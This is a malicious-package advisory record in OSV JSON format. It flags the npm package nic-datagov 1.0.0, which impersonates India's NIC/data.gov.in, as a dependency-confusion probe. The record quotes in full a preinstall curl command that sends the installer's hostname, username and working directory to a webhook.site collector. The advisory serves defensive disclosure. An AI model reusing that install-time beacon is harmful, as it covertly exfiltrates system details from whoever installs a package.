{"id":"MAL-2026-5836","summary":"Malicious code in nic-datagov (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf)\npackage.json declares a preinstall script that runs `curl --data-urlencode \"info=$(hostname && whoami && pwd)\" https://webhook.site/1ea0386f-dcc0-4f1b-bdbb-61732d6535fb/nic-datagov`, sending the installer's hostname, current user, and working directory to a webhook.site collector on `npm install`. The package ships no library code and has no `main`/`files` consistent with its stated 'NIC Data.gov.in integration library' description — its sole effect on install is the recon beacon. The name and description impersonate India's NIC/data.gov.in branding, consistent with a targeted dependency-confusion probe against an internal/government namespace.\n\n## Source: ossf-package-analysis (cde3f0f0a325ac483003eea66dda1dd21f2de2a149a97a7df41c7fb447c5a8ee)\nThe OpenSSF Package Analysis project identified 'nic-datagov' @ 1.0.0 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-06-16T06:01:50.061560076Z","published":"2026-06-15T10:05:40Z","database_specific":{"malicious-packages-origins":[{"sha256":"89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf","import_time":"2026-06-15T21:33:34.632503427Z","id":"IN-MAL-2026-006709","modified_time":"2026-06-15T20:31:19Z","versions":["1.0.0"],"source":"amazon-inspector"},{"import_time":"2026-06-16T05:56:18.583871776Z","modified_time":"2026-06-15T10:05:40Z","versions":["1.0.0"],"source":"ossf-package-analysis","sha256":"cde3f0f0a325ac483003eea66dda1dd21f2de2a149a97a7df41c7fb447c5a8ee"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/nic-datagov/v/1.0.0"}],"affected":[{"package":{"name":"nic-datagov","ecosystem":"npm","purl":"pkg:npm/nic-datagov"},"versions":["1.0.0"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/nic-datagov/MAL-2026-5836.json","cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"indicators":{"evidence_files":[{"tlsh":"13d02be82914b1732dcd46b10914c05de731bf2f10d418196dd64125a0471f6391b76f","path":"package.json","sha256":"1702d2ae9a92ede8848c2d5683faa5274c4cc6a30258e9a24495b6bdeff50281"}],"package_integrity":[{"hashes":{"sha512_sri":"sha512-amRv8T/qMzT6BZ/yrto/FN89vYKDpGYmKA88Ev8GMs1b3aDDIhvIepPHcubVnuZsi7x+kJ2Th/6Kq1T+8Hld5Q==","sha1":"6e79d987bad0ef7e48bdfe01c416b8944cc67bb0"},"filename":"nic-datagov-1.0.0.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}